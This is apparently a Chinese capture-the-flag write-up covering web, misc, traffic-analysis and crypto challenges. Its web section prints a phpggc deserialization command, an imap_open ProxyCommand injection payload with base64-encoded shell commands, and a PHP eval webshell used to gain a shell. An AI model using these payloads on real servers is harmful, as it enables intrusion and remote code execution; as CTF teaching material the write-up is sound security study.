Web
sleep cms
首页发现源码泄露:
http://101.71.29.5:10000/web.zip
代码在/views/medicine/view.php存在序列化操作:
查看
composer.json,发现存在RCE漏洞组件。
利用
phpggc,可以看到有对应版本的攻击。
查看文件运行路径。
尝试文件目录。
/var/www/html/runtime
使用:
phpggc SwiftMailer/FW3 /var/www/html/runtime/sky.php ~/Desktop/sky.php -b
得到payload。
同时有登录密码。
登入后,即可使用
payload getshell拿到flag。
my_email
登录注册后,完善信息后出现更换背景功能,更换背景后可以看到路径:
body{
background-image: url(./user/test123456789.jpg);
background-size: 100%,100%;
width: 100%;
height: 100%;
}
可以看到图片的路径的命名规则是:
$dir = './user/'.$username.'.jpg';
然后继续观察下邮件上传的参数:
php里mail()需要的参数:
bool mail(
string $to,
string $subject,
string $message [,
string $additional_headers [,
string $additional_parameters ]]
)
因为这里与邮箱授权有关,则看imap_open()函数:
imap_open ( string $mailbox , string $username , string $password [, int $options = 0 [, int $n_retries = 0 [, array $params = NULL ]]] ) : resource
在第一个参数$mailbox会产生漏洞。
使用payload:
<?php
$payload = "echo '<?php phpinfo();' > /var/www/html/user/any.php";
$encoded_payload = base64_encode($payload);
$server = "any -o ProxyCommand=echot".$encoded_payload."|base64t-d|bash";
echo $server;
得到:
any -o ProxyCommand=echotZWNobyAnPD9waHAgcGhwaW5mbygpOycgPiAvdmFyL3d3dy9odG1sL3VzZXIvc2t5LnBocA==|base64t-d|bash
尝试,发现过滤了bash、|。
根据之前的上传功能,可以利用
bash filename。构造:
echo 'echo "<?php phpinfo();"> hack.php' > hack.jpg
然后上传hack.jpg,再利用imap_open进行RCE:
any -o ProxyCommand=bash hack.jpg}
然后构造
payload后getshell就能得到flag了。
echo 'echo "<?php eval($_REQUEST[hack]);"> hack.php' > hack.jpg
any -o ProxyCommand=bash hack.jpg}
babycms
Misc
来玩个游戏吧
先要破解:
⠏⠏⠄⠁⠄⠀⠂⡑⡒⡓⠄⡒⠂⡑⠇⠆⡒⠉⠇⠁⠉⡔⠉⠁⠁⠀⠁⠇⡓⠅⠉⠂=
盲文加密,利用在线网站解密:https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=mangwen
得到:
??41402abc4b2a76b9719d911017c592
前两位为??,猜测为MD5加密,放到百度一搜就能得到原文:
5d41402abc4b2a76b9719d911017c592
找两个MD5一样的用Fastcoll命令就可以得到。
得到邮件:
送你一封包含flag的邮件:
Dear Professional ; Especially for you - this cutting-edge
intelligence ! If you no longer wish to receive our
publications simply reply with a Subject: of "REMOVE"
and you will immediately be removed from our club .
This mail is being sent in compliance with Senate bill
2216 , Title 9 ; Section 306 ! THIS IS NOT MULTI-LEVEL
MARKETING . Why work for somebody else when you can
become rich as few as 35 weeks . Have you ever noticed
more people than ever are surfing the web and people
will do almost anything to avoid mailing their bills
. Well, now is your chance to capitalize on this !
WE will help YOU decrease perceived waiting time by
120% & decrease perceived waiting time by 140% . You
can begin at absolutely no cost to you . But don't
believe us ! Mrs Jones of Minnesota tried us and says
"I was skeptical but it worked for me" . We assure
you that we operate within all applicable laws . Because
the Internet operates on "Internet time" you must act
now ! Sign up a friend and your friend will be rich
too . Warmest regards . Dear Cybercitizen , We know
you are interested in receiving red-hot announcement
! We will comply with all removal requests ! This mail
is being sent in compliance with Senate bill 1619 ;
Title 2 ; Section 301 . This is NOT unsolicited bulk
mail ! Why work for somebody else when you can become
rich within 53 MONTHS ! Have you ever noticed more
people than ever are surfing the web and more people
than ever are surfing the web . Well, now is your chance
to capitalize on this . We will help you use credit
cards on your website plus decrease perceived waiting
time by 150% . The best thing about our system is that
it is absolutely risk free for you ! But don't believe
us ! Mrs Simpson of Washington tried us and says "Now
I'm rich, Rich, RICH" . We assure you that we operate
within all applicable laws ! We beseech you - act now
! Sign up a friend and your friend will be rich too
. Thank-you for your serious consideration of our offer
! Dear Friend ; This letter was specially selected
to be sent to you ! If you no longer wish to receive
our publications simply reply with a Subject: of "REMOVE"
and you will immediately be removed from our mailing
list . This mail is being sent in compliance with Senate
bill 2716 , Title 2 ; Section 306 ! This is a ligitimate
business proposal . Why work for somebody else when
you can become rich inside 33 weeks . Have you ever
noticed more people than ever are surfing the web plus
more people than ever are surfing the web . Well, now
is your chance to capitalize on this ! WE will help
YOU SELL MORE and process your orders within seconds
. You can begin at absolutely no cost to you . But
don't believe us ! Mrs Jones of Kentucky tried us and
says "I was skeptical but it worked for me" ! This
offer is 100% legal ! We implore you - act now . Sign
up a friend and you'll get a discount of 50% . God
Bless .
google垃圾邮件和栅格密码,得到一个在线解密网址,解密得到flag。
flow
流量分析题目。
经过分析发现abc.html,导出可以看到:
md5 0x99a98e067af6b09e64f3740767096c96
DES 0xb19b21e80c685bcb052988c11b987802d2f2808b2c2d8a0d (129->143)
DES 0x684a0857b767672d52e161aa70f6bdd07c0264876559cb8b (143->129)
从协议分级里可以看出,有IPSec Encapsulating Security Payload加密的流量。
加载密钥。
重新看到
http流量里多了很多流量。
把
38个ASCII码提取出来拼接就得到了flag。
a = [102,108,97,103,123,50,55,98,48,51,98,55,53,56,102,50,53,53,50,55,54,101,53,97,57,56,100,97,48,101,49,57,52,55,98,101,100,125]
res = ''
for i in a:
res +=chr(i)
print res
Crypto
hahaha
一个加密的压缩包。
使用crc32爆破:
$ python crc32.py reverse 0x19BA5849
得到密码:tanny_is_very_beautifu1_
解密得到flag.pdf。
要找到
sha1值为e6079c5ce56e781a50f4bf853cdb5302e0d8f054的。排列组合包括如下:
1!
2@
{[
}]
asefcghnl
因为是flag{}的样式,过滤一些样式得到:
1!
2@
sechn
使用如下脚本:
import itertools
import hashlib
def sha1(str):
sha = hashlib.sha1(str)
encrypts = sha.hexdigest()
return encrypts
a1 = '1!'
a2 = '2@'
a3 = '{'
a4 = '}'
for str1 in itertools.combinations(a1,1):
for str2 in itertools.combinations(a2,1):
str3 = str1[0]+str2[0]+'sechn'
for i in itertools.permutations(str3):
tmp = (''.join(i))
res = 'flag{'+tmp+'}'
# print sha1(res)
if sha1(res) == 'e6079c5ce56e781a50f4bf853cdb5302e0d8f054':
print res
break
得到flag。
网友评论